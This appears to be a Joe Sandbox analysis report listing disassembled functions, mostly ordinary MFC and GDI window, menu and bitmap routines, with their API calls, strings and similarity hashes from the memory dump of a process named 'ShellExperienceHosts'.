GetClientRect.USER32(00000000,?), ref: 6C9B8C62
GetClientRect.USER32(00000000,?), ref: 6C9B8C6D
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 6C9B8C7B

Strings

(, xrefs: 6C9B8BE9

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
String ID: (
API String ID: 3610148278-3887548279
Opcode ID: 792c56d837de4831922e924a676cbdae6a8a8965e2cc6ee8d2062e46828b8bd1
Instruction ID: 8d91c36b4dd26ec8dac3e2b966abe1fbbd2eb24db8b5ef10a30ae5f5a7581457
Opcode Fuzzy Hash: 792c56d837de4831922e924a676cbdae6a8a8965e2cc6ee8d2062e46828b8bd1
Instruction Fuzzy Hash: C8615D72A0161AAFDF01CBA8CD88AEEB7B9FF49704F250215E505B7644DB30E945CB64

Function 6CA2298F Relevance: 29.0, APIs: 19, Instructions: 474windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CA22999
IsWindow.USER32(?), ref: 6CA22A30
GetMenuItemCount.USER32(?), ref: 6CA22BD5
AppendMenuW.USER32(?,00000000,00000000,?), ref: 6CA22C06
SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 6CA22C8C
SendMessageW.USER32(000000FF,0000041C,00000000,?), ref: 6CA22CCD
GetMenuItemCount.USER32(?), ref: 6CA22D40
AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 6CA22D56
AppendMenuW.USER32(?,00000000,00000000,?), ref: 6CA22D71
GetMenuItemCount.USER32(?), ref: 6CA22DE0
AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 6CA22DF6
AppendMenuW.USER32(?,00000000,00000000,?), ref: 6CA22E10
AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 6CA22BEB

Part of subcall function 6C9BE402: GetDlgCtrlID.USER32(?), ref: 6C9BE40D

AppendMenuW.USER32(?,00000000,00000000,?), ref: 6CA22EFA
GetWindow.USER32(?,00000005), ref: 6CA22F2A
AppendMenuW.USER32(?,00000000,00000000,?), ref: 6CA22FA5
GetMenuItemCount.USER32(?), ref: 6CA22FE9
AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 6CA22FFF
AppendMenuW.USER32(?,00000000,00000000,?), ref: 6CA23016

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Menu$Append$CountItem$MessageSendWindow$CtrlH_prolog3_
String ID:
API String ID: 465015882-0
Opcode ID: 331fd9b092c253025a53252fd35359907a26c66bbd28cc198df270b1bea23818
Instruction ID: 9d4798fbc5fe3281bf16ed3a023991b3d25cc3c981e4399916b554c116671bc2
Opcode Fuzzy Hash: 331fd9b092c253025a53252fd35359907a26c66bbd28cc198df270b1bea23818
Instruction Fuzzy Hash: B602AE30A00269DFDF259F64C858BADBB75BF58314F288199E809AB791CF34AD85CF50

Function 6C9D8101 Relevance: 28.7, APIs: 19, Instructions: 239windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9D8108
CreateRectRgnIndirect.GDI32(?), ref: 6C9D8140
CopyRect.USER32(?,?), ref: 6C9D8154
InflateRect.USER32(?,?,?), ref: 6C9D816A
IntersectRect.USER32(?,?,?), ref: 6C9D8176
CreateRectRgnIndirect.GDI32(?), ref: 6C9D8180
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C9D8195
CombineRgn.GDI32(?,?,?,00000003), ref: 6C9D81AF
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C9D81F6
SetRectRgn.GDI32(?,?,00000004,?,?), ref: 6C9D8213
CopyRect.USER32(?,?), ref: 6C9D821E
InflateRect.USER32(?,?,?), ref: 6C9D8234
IntersectRect.USER32(?,?,?), ref: 6C9D8240
SetRectRgn.GDI32(?,?,?,?,?), ref: 6C9D8255
CombineRgn.GDI32(?,?,?,00000003), ref: 6C9D8266
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C9D827A
CombineRgn.GDI32(?,?,?,00000003), ref: 6C9D8294

Part of subcall function 6C9D845D: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 6C9D84A4
Part of subcall function 6C9D845D: CreatePatternBrush.GDI32(00000000), ref: 6C9D84B1
Part of subcall function 6C9D845D: DeleteObject.GDI32(00000000), ref: 6C9D84BD

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 6C9D82F2

Part of subcall function 6C9C802C: SelectObject.GDI32(?,00000000), ref: 6C9C804C
Part of subcall function 6C9C802C: SelectObject.GDI32(?,00000000), ref: 6C9C8062

Part of subcall function 6C9C7F41: SelectClipRgn.GDI32(?,00000000), ref: 6C9C7F61
Part of subcall function 6C9C7F41: SelectClipRgn.GDI32(?,00000000), ref: 6C9C7F77

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 6C9D8355

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prolog3_Pattern
String ID:
API String ID: 770706554-0
Opcode ID: 6e809a23fb5c6e3a7190c8f7cd286447ca66220ea6cb9d676cd4ab528ed6767c
Instruction ID: b100dcc2785e22fb85c55eee3f1d8bbfdc174a4db0b33c9c9e776022b1f6fb6e
Opcode Fuzzy Hash: 6e809a23fb5c6e3a7190c8f7cd286447ca66220ea6cb9d676cd4ab528ed6767c
Instruction Fuzzy Hash: 0F91F4B1A00259AFCF15DFE4D998DEEBBB9BF59300F044119F90AB3650DB34A904DB61

Function 6C9BC8D4 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9BC8DE

Part of subcall function 6C9D2379: __EH_prolog3.LIBCMT ref: 6C9D2380

CallNextHookEx.USER32(?,?,?,?), ref: 6C9BC916
SetWindowLongW.USER32(?,000000FC,6C9B80B1), ref: 6C9BC9BA
CallNextHookEx.USER32(?,00000003,?,?), ref: 6C9BCACA
UnhookWindowsHookEx.USER32(?), ref: 6C9BCADE

Strings

AfxOldWndProc423, xrefs: 6C9BCA78, 6C9BCA89, 6C9BCA95, 6C9BCAA5
#32768, xrefs: 6C9BCA08, 6C9BCA0E, 6C9BCA47

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Hook$CallNext$H_prolog3H_prolog3_LongUnhookWindowWindows
String ID: #32768$AfxOldWndProc423
API String ID: 1591070667-2141921550
Opcode ID: 7c8183c5799c435bd34da03e89391356a8c8367912b99032acfc30eaeb1886d4
Instruction ID: 624cda248e0d5ffae199c86a7a63130a0e8f68763210a4929c51be8d4324e8af
Opcode Fuzzy Hash: 7c8183c5799c435bd34da03e89391356a8c8367912b99032acfc30eaeb1886d4
Instruction Fuzzy Hash: EE51B335640268ABCB21AF60DC48FEF3B78AF56755F100199F809B7A80CB30DE85DB91

Function 6C9C8713 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 146windowCOMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000800,?,?,4(@P,00000000,6C9B4555,00000080,?,00000800,50402834), ref: 6C9C8722
LockResource.KERNEL32(00000000,?,00000800,50402834), ref: 6C9C8731

Part of subcall function 6C9C26E8: _memcpy_s.LIBCMT ref: 6C9C26F7

GetSysColor.USER32 ref: 6C9C87B5
GetSysColor.USER32 ref: 6C9C87C8
GetSysColor.USER32 ref: 6C9C87E3
GetDC.USER32(00000000), ref: 6C9C8819
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 6C9C8829
CreateCompatibleDC.GDI32(00000000), ref: 6C9C8837
SelectObject.GDI32(00000000,00000800), ref: 6C9C8843
StretchDIBits.GDI32(00000000,00000000,00000000,4(@P,?,00000000,00000000,4(@P,?,00000008,00000000,00000000,00CC0020), ref: 6C9C8876
SelectObject.GDI32(00000000,00000000), ref: 6C9C887E
DeleteDC.GDI32(00000000), ref: 6C9C8885
ReleaseDC.USER32(00000000,00000000), ref: 6C9C8891

Strings

4(@P, xrefs: 6C9C87E9, 6C9C8864, 6C9C886E, 6C9C8872
4(@P, xrefs: 6C9C871A, 6C9C8754, 6C9C8765, 6C9C8767

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch_memcpy_s
String ID: 4(@P$4(@P
API String ID: 367613035-294022790
Opcode ID: a06b26b20e2821dd7b096b52d47dfb77d40f16f78b8817de0c88293e2f96bd0a
Instruction ID: 10c356bd5844c6f902de492d96a8b7eba9979e4d9f2dab3f7bf3e1ce6236f5e9
Opcode Fuzzy Hash: a06b26b20e2821dd7b096b52d47dfb77d40f16f78b8817de0c88293e2f96bd0a
Instruction Fuzzy Hash: 1941B575B01154BFEB148F99CC84ABFBBB9EF86701B10805AF519E7640D730DA51CBA2

Function 6CAB382C Relevance: 24.4, APIs: 16, Instructions: 395COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CAB3833
GetCursorPos.USER32(?), ref: 6CAB38EC
IsRectEmpty.USER32(?), ref: 6CAB3920
IsRectEmpty.USER32(?), ref: 6CAB3947
IsRectEmpty.USER32(?), ref: 6CAB3969
GetWindowRect.USER32(?,?), ref: 6CAB3997
GetWindowRect.USER32(?,?), ref: 6CAB39C7
PtInRect.USER32(?,?,?), ref: 6CAB3A14
OffsetRect.USER32(?,?,00000000), ref: 6CAB3A2C

Part of subcall function 6CAB4A45: __EH_prolog3.LIBCMT ref: 6CAB4A4C
Part of subcall function 6CAB4A45: SetRectEmpty.USER32 ref: 6CAB4B4C
Part of subcall function 6CAB4A45: SetRectEmpty.USER32(?), ref: 6CAB4B53

SetRectEmpty.USER32(?), ref: 6CAB3A4F
OffsetRect.USER32(?,?,?), ref: 6CAB3BE0
IsRectEmpty.USER32(?), ref: 6CAB3C00
IsRectEmpty.USER32(?), ref: 6CAB3C33
PtInRect.USER32(?,00000000,00000000), ref: 6CAB3C47
OffsetRect.USER32(?,?,?), ref: 6CAB3C73
IsRectEmpty.USER32(?), ref: 6CAB3C92

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Empty$Offset$Window$CursorH_prolog3H_prolog3_
String ID:
API String ID: 359163869-0
Opcode ID: 0c22454be4964bdf423eeaf26963c879e4a23e05e8d9f4feb7ec38324aabe9f6
Instruction ID: cd67268e564f602d5fbcc2f5678f57cc2785415ff97017096832ac9c42fda396
Opcode Fuzzy Hash: 0c22454be4964bdf423eeaf26963c879e4a23e05e8d9f4feb7ec38324aabe9f6
Instruction Fuzzy Hash: 3CE1AF31A02249DFDF05CFA4C984AADBBB9FF49314F184159ED05AF649EB31E889CB50

Function 6C9D43DE Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 172libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 6C9D4411
GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 6C9D4421
EncodePointer.KERNEL32(00000000,?,?), ref: 6C9D442A
DecodePointer.KERNEL32(00000000,?,?), ref: 6C9D4438
GetUserDefaultUILanguage.KERNEL32(?,?), ref: 6C9D445F
___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C9D446F
___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C9D44A3
GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9D44D6
___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C9D44E6
___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C9D4523
___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C9D455E

Strings

GetThreadPreferredUILanguages, xrefs: 6C9D441B
kernel32.dll, xrefs: 6C9D440C

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: DownlevelLocaleName___crt$DefaultLanguagePointer$AddressDecodeEncodeHandleModuleProcSystemUser
String ID: GetThreadPreferredUILanguages$kernel32.dll
API String ID: 404278886-1646127487
Opcode ID: 71be8c778d54d2b379a10f1ed9e2b61241fc294631ef7a28d4c4ec98c7d9201a
Instruction ID: 0a56daf374b2a6a481daa72659f4db15b66ed1f490f45378d529e8975d731e13
Opcode Fuzzy Hash: 71be8c778d54d2b379a10f1ed9e2b61241fc294631ef7a28d4c4ec98c7d9201a
Instruction Fuzzy Hash: 8C5108B1A0025AAFCB14DFA4C984DEE77BDEF49309F014166E905E7640DB34EA09CBA5

Function 6C9F67D7 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 347windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9F67E1
GetClientRect.USER32(?,?), ref: 6C9F67FF
CreateCompatibleDC.GDI32(00000000), ref: 6C9F6838
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C9F688D
CreateDIBSection.GDI32(?,?), ref: 6C9F68FF
CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C9F6938
CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C9F696B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6C9F69D3
GetWindowRect.USER32(?,?), ref: 6C9F6A42
BitBlt.GDI32(?,00CC0020,?,?,?,?,00000000,00000000,00CC0020), ref: 6C9F6B92

Strings

(, xrefs: 6C9F68DB

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Create$Section$CompatibleRect$BitmapClientH_prolog3_Window
String ID: (
API String ID: 2918208214-3887548279
Opcode ID: cd43689f3a0024c376083b7f864a2878c95b79f00d987ce5b3e8890b27ba88ad
Instruction ID: 0c9382b8ebac0d366cf100512c317cd2c53dd128348378a4708b7950ec4f10c9
Opcode Fuzzy Hash: cd43689f3a0024c376083b7f864a2878c95b79f00d987ce5b3e8890b27ba88ad
Instruction Fuzzy Hash: 8DD13771A00659AFDF15CFA8C9949EEBBB9FF18304F10412AE529E7A10DB30AD55CF50

Function 6C9FBB58 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 216COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9FBB5F

Part of subcall function 6C9C28BA: __EH_prolog3.LIBCMT ref: 6C9C28C1

Part of subcall function 6CA6DD92: __EH_prolog3.LIBCMT ref: 6CA6DD99

Strings

MFCButton, xrefs: 6C9FBB7E
MFCFontComboBox, xrefs: 6C9FBC2F
MFCPropertyGrid, xrefs: 6C9FBD17
MFCShellList, xrefs: 6C9FBD51
MFCMaskedEdit, xrefs: 6C9FBCA3
MFCColorButton, xrefs: 6C9FBBBB
MFCVSListBox, xrefs: 6C9FBDB7
MFCLink, xrefs: 6C9FBC69
MFCEditBrowse, xrefs: 6C9FBBF5
MFCMenuButton, xrefs: 6C9FBCDD
MFCShellTree, xrefs: 6C9FBD84

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: H_prolog3
String ID: MFCButton$MFCColorButton$MFCEditBrowse$MFCFontComboBox$MFCLink$MFCMaskedEdit$MFCMenuButton$MFCPropertyGrid$MFCShellList$MFCShellTree$MFCVSListBox
API String ID: 431132790-2110171958
Opcode ID: 0657389b815cc7ecaa5bb683c356256ca1965a82a21892a8a5d57d56b22b56cf
Instruction ID: 0ca427f40d07d1d2bd102ef82a0cfaec3e9ffc54f4e1ed32cb72215299e49156
Opcode Fuzzy Hash: 0657389b815cc7ecaa5bb683c356256ca1965a82a21892a8a5d57d56b22b56cf
Instruction Fuzzy Hash: 5861C36190924AA9EF04DAF89A14BEE77F85F2125CF20049AD424FBEC0DF75C649C732

Function 6CA1EBD9 Relevance: 19.9, APIs: 13, Instructions: 412windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CA1EBE3
GetWindowRect.USER32(?,?), ref: 6CA1EC77
SetRect.USER32(?,00000000,00000000,?,?), ref: 6CA1EC98
CreateCompatibleDC.GDI32(?), ref: 6CA1ECA4
CreateCompatibleBitmap.GDI32(?,?,00000128), ref: 6CA1ECCE
GetWindowRect.USER32(?,?), ref: 6CA1ED23
GetClientRect.USER32(?,?), ref: 6CA1ED30
OffsetRect.USER32(?,?,?), ref: 6CA1ED51
IsRectEmpty.USER32(?), ref: 6CA1ED81
SetRectEmpty.USER32(?), ref: 6CA1EE14
InflateRect.USER32(?,000000FE,00000000), ref: 6CA1F094
CreateRectRgnIndirect.GDI32(?), ref: 6CA1ED8C

Part of subcall function 6C9C7F41: SelectClipRgn.GDI32(?,00000000), ref: 6C9C7F61
Part of subcall function 6C9C7F41: SelectClipRgn.GDI32(?,00000000), ref: 6C9C7F77

BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 6CA1F176

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Create$ClipCompatibleEmptySelectWindow$BitmapClientH_prolog3_IndirectInflateOffset
String ID:
API String ID: 3231449308-0
Opcode ID: 8303beb37a401e1f6cef27091c8169952be6ce9c90adc8c9b3721c83c5db6bd4
Instruction ID: ee546ffff520298b5f809032a56afa134fb42f11feb6a9a553cd8e8ed92bb71f
Opcode Fuzzy Hash: 8303beb37a401e1f6cef27091c8169952be6ce9c90adc8c9b3721c83c5db6bd4
Instruction Fuzzy Hash: CF020631A002699FCF25CB64CD58BEDB7B5BF59304F14419AE90AB7A50DB30AE85CF90

Function 6C9FA769 Relevance: 19.8, APIs: 13, Instructions: 273windowCOMMON

Download Yara Rule

APIs

GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 6C9FA79C
DispatchMessageW.USER32(?), ref: 6C9FA7AA
PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C9FA7B8
GetCapture.USER32 ref: 6C9FA7C2
SetCapture.USER32(?), ref: 6C9FA7D6
GetWindowRect.USER32(?,?), ref: 6C9FA7F3
GetCapture.USER32 ref: 6C9FA866
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6C9FA883
DispatchMessageW.USER32(?), ref: 6C9FA8A9
GetScrollPos.USER32(00000000,00000002), ref: 6C9FA9C6
RedrawWindow.USER32(?,00000000,00000000,00000581), ref: 6C9FA9E3
ReleaseCapture.USER32 ref: 6C9FAA85
IsWindow.USER32(?), ref: 6C9FAA8E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Message$Capture$Window$Dispatch$PeekRectRedrawReleaseScroll
String ID:
API String ID: 1873598099-0
Opcode ID: 42d9202d6e00704d8c905133b317043b85bf4d61fd27836424f43f45945146ef
Instruction ID: d2891731a7aba19609bc544267846203dbf15311cc670f0a46083b9f1225c8dd
Opcode Fuzzy Hash: 42d9202d6e00704d8c905133b317043b85bf4d61fd27836424f43f45945146ef
Instruction Fuzzy Hash: A6A16931B012549FDF148F64C998BEE7BB9FF49704F1401B9E81AAB685CB70D946CBA0

Function 6C9F2AA7 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 404windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9F2AB1
GetParent.USER32(?), ref: 6C9F2B2D
SendMessageW.USER32(?,00000117,?,?), ref: 6C9F2BD6
GetMenuItemCount.USER32(?), ref: 6C9F2BE5
GetMenuItemInfoW.USER32(00000000,00000000,00000001,?), ref: 6C9F2CCB
GetMenuState.USER32(00000000,00000000,00000400), ref: 6C9F2CEC
CharUpperW.USER32(?,?), ref: 6C9F2E60
GetMenuDefaultItem.USER32(?,00000000,00000001), ref: 6C9F3084

Strings

0, xrefs: 6C9F2CAE
7, xrefs: 6C9F2CB8
@, xrefs: 6C9F3028

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Menu$Item$CharCountDefaultH_prolog3_InfoMessageParentSendStateUpper
String ID: 0$7$@
API String ID: 3317760994-3997377745
